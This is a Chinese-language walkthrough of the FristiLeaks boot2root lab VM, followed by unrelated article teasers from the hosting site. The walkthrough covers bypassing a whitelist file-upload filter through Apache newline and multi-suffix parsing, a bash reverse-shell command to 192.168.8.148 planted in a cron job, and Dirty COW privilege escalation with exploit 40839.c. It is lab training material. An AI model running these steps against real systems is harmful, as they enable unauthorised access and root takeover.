白名單過濾的文件上傳如何bypass:boot2root靶機之fristileaks

靶機提示

base64解碼提取圖片 文件上傳之apache多后綴名解析漏洞 linpeas dirtycow提權

靶機下載

通過網盤分享的文件:FristiLeaks_1.3.ova
鏈接: https://pan.baidu.com/s/1ZWznp8egNGwnQqwh1gkSZg?pwd=wwvp 提取碼: wwvp 
--來自百度網盤超級會員v8的分享

主機發現

nmap -sn 192.168.8.0/24

端口掃描

tcp

只開了一個80端口,很少見

nmap -sT --min-rate 10000 -p- 192.168.8.177 

udp

沒有開任何端口,看來只能盯著80端口打了

nmap -sU --top-ports=100 192.168.8.177

目錄掃描

發現了robots.txt,嘗試了一些目錄掃描但是都沒有發現可以深入的信息

dirb http://192.168.8.177


來點腦洞

ps:個人這邊沒有想到這個目錄,掃了n遍目錄,還在考慮圖片隱寫的問題。。。

提示去找url入口,也就是尋找目標目錄,一般來說這個目錄就很難用目錄掃描出來。聯想到首頁幾個超級大的字母,以及靶機名字,推測出目錄為fristi

首頁是個

入口

web滲透

查看前端源碼
有一個tips,還有用戶名

還有一段base64

base64解碼提取

echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==" |base64 -d > 1.png

是個圖片

嘗試登錄

eezeepz/keKkeKKeKKeKkEkkEk

成功登錄

文件上傳漏洞

準備好反彈shell木馬

白名單過濾

發現是白名單過濾,這個防護等級是比較高的,一般只有遇到apache幾個解析漏洞才能繞過

apache換行解析漏洞

這個漏洞是配置不當導致的

<FilesMatch \.php$>SetHandler application/x-httpd-php
</FilesMatch>
前三行代碼:將所有.php結尾的文件當做php文件進行解析。
$:正則表達式匹配字符串結束位置,若存在換行,則匹配換行符為結尾。這導致在上傳時,添加一個換行符也能被正常解析,并且能夠繞過系統的黑名單檢測
利用$和換行符可以繞過黑名單機制。

上傳evil.php/x0A,放行數據包,訪問上傳的文件,要加%0A

apache多后綴解析漏洞
形成原因:配置apache時,對于apache配置不熟練,配置命令不清楚,在配置PHP文件處理程序時,配置命令存在問題:位于漏洞環境目錄的 conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php .php),該命令會將后綴中只要含有.php的文件都會被處理程序解析,這導致攻擊者可通過多后綴繞過文件上傳限制以.php結尾的機制,并使之被處理程序執行。
上傳圖片馬

我們上傳2.php.png,apache服務器看到有php結尾就會解析

訪問2.php.png.成功反彈shell

橫向滲透

敏感信息搜集

進入用戶eezeepz的家目錄,發現一個notes文件,提示/tmp有一個定時任務,每分鐘執行一次runthis文件里面命令

寫入反彈shell命令,但是沒有反彈

/bin/bash -i >& /dev/tcp/192.168.8.148/4321 0>&1

臟牛提權

定時任務一直不執行反彈shell的命令,嘗試一下linpeas,看看能不能臟牛提權

全稱為Linux Privilege Escalation Awesome Script,是?個?來搜索類unix主機上可能
的提權路徑的?動化腳本。
Github:https://github.com/carlospolop/privilege-escalation-awesome
scripts-suite/tree/master/linPEAS

攻擊機開啟文件服務

python -m http.server 8000

靶機下載linpeas.sh

linpeas啟動

果然有臟牛提權漏洞

一般用40839.c

傳輸到靶機上

編譯腳本提權

查看腳本用法
head -n 30 40839.c

按部就班提權
gcc -pthread 40839.c -o 40839 -lcrypt./40839 123456su firefart

提權

靶機總結

這臺靶機入口找了半天,純純ctf腦洞題。。。很難想到入口是fristi,還在那邊弄圖片隱寫,分析了半天。

但是入口進來之后,考了一個比較基礎的base64解碼;另外還考了一個文件上傳的漏洞,這個apache多后綴名解析的漏洞,實戰中確實是遇到過的,很有價值

最后提權部分,定時任務一直不能反彈shell,也弄了半天。。。,沒有找到原因;但是臟牛提權還是很順利的,這個技能需要熟練掌握

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/96529.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/96529.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/96529.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Centos 8 管理防火墻

firewall-cmd 檢查與安裝 在 CentOS 8 上安裝和啟用 firewalld&#xff08;提供 firewall-cmd 工具&#xff09;的步驟如下&#xff1a;1. 檢查 **firewalld** 是否已安裝 在安裝前&#xff0c;先檢查系統中是否已安裝&#xff1a; sudo firewall-cmd --version如果返回版本號&…

使用PPT進行科研繪圖過程中常用的快捷鍵

PPT科研繪圖常用快捷鍵速查表功能類別快捷鍵功能描述基礎操作與選擇Ctrl A全選幻燈片上的所有對象。Ctrl D快速復制選中的對象&#xff0c;并自動保持等間距排列。Shift Click多選多個對象。Ctrl G將選中的多個對象組合成一個整體。Ctrl Shift G取消組合。Ctrl 拖動復制…

`strchr` 字符串查找函數

1) 函數的概念與用途 strchr 是 C 標準庫中的一個基礎但極其重要的字符串處理函數&#xff0c;它的名字來源于"string chracter"&#xff08;字符串字符&#xff09;。這個函數的功能非常明確&#xff1a;在字符串中查找特定字符的第一次出現位置。 可以將 strchr 想…

Redis 678

Redis 8 是當前的最新穩定版&#xff08;截至 2024 年中&#xff09;&#xff0c;它在 Redis 7 的基礎上帶來了更多重要改進。我們來對這三個主要版本進行一次全面的功能和性能對比。 核心演進脈絡 Redis 6 (2020)&#xff1a;多線程時代的開創者。解決了網絡 I/O 瓶頸&#xf…

【大白話解析】 OpenZeppelin 的 Address 庫:Solidity安全地址交互工具箱?(附源代碼)

?? 一、這個文件是干嘛的?—— Address.sol 是個“工具箱” 你可以把這個 Address.sol文件理解為一個 ??“工具箱”??,里面裝了一堆??專門用來安全地跟別的地址(賬戶或合約)打交道的工具函數??。 在區塊鏈世界里,地址(address)可以是: ??外部賬戶(EOA)…

漫談《數字圖像處理》之測不準原理

在數字圖像處理中&#xff0c;提到的 “測不準原理” &#xff0c;和量子力學里由海森堡提出的 “不確定性原理” &#xff08;Heisenberg uncertainty principle&#xff0c;也叫海森堡測不準原理&#xff09;有一定的類比關系&#xff0c;但本質上并不是同一個概念。以下為詳…

Linux服務測試

一、環境準備確認 確保 4 臺主機&#xff08;APPSRV、STORAGESRV、ROUTERSRV、CLIENT &#xff09;網絡連接正常&#xff0c;虛擬機網卡模式按要求設置&#xff08;APPSRV、STORAGESRV 為 NAT 模式&#xff1b;ROUTERSRV 為雙網卡&#xff0c;NAT 僅主機模式&#xff1b;CLIE…

2.Shell腳本修煉手冊---創建第一個 Shell 腳本

2. 創建第一個 Shell 腳本 文章目錄2. 創建第一個 Shell 腳本2.1 什么是 Shell 腳本&#xff1f;2.1.1 腳本開頭&#xff1a;告訴系統用什么程序執行2.1.2 腳本注釋&#xff1a;給人看的 “說明書”2.1.3 bash 與 sh 的區別2.2 如何執行 Shell 腳本&#xff1f;方法 1&#xff…

Day22 順序表與鏈表的實現及應用(含字典功能與操作對比)

day22 順序表與鏈表的實現及應用&#xff08;含字典功能與操作對比&#xff09; 使用順序表實現查字典功能 支持連續查詢單詞&#xff0c;輸入 #quit 退出程序。數據格式示例如下&#xff1a; a\0 indef art one\r\n word mean [---buf--->] [---i--…

51單片機與stm32單片機,先學習哪一個?

糾結 51 單片機和 STM32 該先學哪個&#xff0c;就像剛學開車的人在自動擋和手動擋之間打轉。有人一上來就愛開自動擋&#xff0c;踩著油門就能跑&#xff0c;不用琢磨換擋踩離合的門道&#xff1b;有人偏要從手動擋練起&#xff0c;哪怕起步時熄十幾次火&#xff0c;也得搞明白…

DS 0 | 數據結構學習:前言

數據結構是CS最基礎、最重要的課程之一在學習數據結構時&#xff0c;通常來講&#xff0c;學生遇到的難點不在于對數據結構的理解&#xff0c;而在于如何寫程序。即編寫特定的程序&#xff0c;來實現這些數據結構&#xff0c;特別是如何按照面向對象思想將一個個數據結構設計成…

JVM-(8)JVM啟動的常用命令以及參數

JVM啟動的常用命令以及參數 在上文 JVM 堆內存邏輯分區 中已經使用過一些 jvm 啟動命令&#xff0c;本文著重講述JVM啟動命令用法以及一些常用的參數 一. 基本命令格式 java [options] classname [args...] java [options] -jar filename.jar [args...]① [options] - 命令行…

GO學習記錄七——上傳/下載文件功能,添加啟動運行工具

本來計劃是學習Docker部署的&#xff0c;研究了一天沒搞出來&#xff0c;得出結論是需要翻墻&#xff0c;懶得弄了&#xff0c;暫時放置。 一、以下是&#xff0c;上傳/下載代碼&#xff0c;和之前是重復的&#xff0c;只多添加了&#xff0c;上傳/下載功能。 測試目錄為工程根…

SQL中對視圖的操作命令匯總

以下是基于搜索結果整理的SQL視圖操作命令匯總&#xff0c;按功能分類說明&#xff1a; 一、創建視圖 使用 CREATE VIEW 語句定義視圖&#xff0c;需指定視圖名稱和基礎查詢表達式&#xff1a; CREATE VIEW view_name AS SELECT column1, column2, ... FROM table_name WHER…

【Spring Cloud 微服務】2.守護神網關Gateway

目錄 1.API網關的作用 2.Spring Cloud Gateway 是什么&#xff1f; 3.核心由來與背景 1. 微服務架構的挑戰&#xff1a; 2. API 網關模式的興起&#xff1a; 3. Zuul 的局限性&#xff1a; 4. Spring Cloud Gateway 的誕生&#xff1a; 4.核心特征&#xff1a; 5.核心概…

解讀商業智能BI,數據倉庫中的元數據

之前的文章討論過數據分析、數據治理、數據倉庫等等&#xff0c;即使是非業內人員從字面意思&#xff0c;也是可以了解一二的&#xff0c;但是&#xff0c;很多人對于元數據可能就比較陌生了。那么&#xff0c;今天我們就來聊一聊元數據管理。數據倉庫要說元數據&#xff0c;那…

3 種無誤的方式刪除 Itel 手機上的短信

如果你希望釋放存儲空間、保護隱私&#xff0c;或者準備出售或轉讓手機&#xff0c;刪除 Itel 手機上的短信是一個實用的步驟。無論是收件箱中充斥著垃圾短信、過時的對話還是敏感內容&#xff0c;刪除不需要的短信可以讓你的消息體驗更加干凈和安全。本文將向你介紹 3 種簡單且…

【學習筆記】網絡安全專用產品類別與參考標準

一、基本標準 1.1 關鍵設備 網絡關鍵設備認證依據的強制標準為 GB 40050-2021。 1.2 專用產品 網絡安全專用產品認證依據的強制標準為 GB 42250-2022。 二、數據備份與恢復產品標準 相關標準&#xff1a; GB/T 29765-2021《信息安全技術 數據備份與恢復產品技術要求與測試評…

Pytho“張量”(Tensor)和 Java的“向量”(Vector)區別和聯系

在Python和Java中&#xff0c;“張量”&#xff08;Tensor&#xff09;和“向量”&#xff08;Vector&#xff09;是兩個不同語境下的概念&#xff0c;它們的設計目標、功能和應用場景存在顯著差異&#xff0c;但也存在一定的共性。以下從區別和聯系兩方面詳細說明&#xff1a;…

Ubuntu部署K8S集群

Ubuntu部署K8S集群 本例以三臺Ubuntu24.04為例,1master節點2worker節點 環境準備 修改hostname,三臺服務器分別執行 hostnamectl set-hostname k8s-master01hostnamectl set-hostname k8s-worker01hostnamectl set-hostname k8s-worker02 配置靜態ip(不同系統修改方法略微差…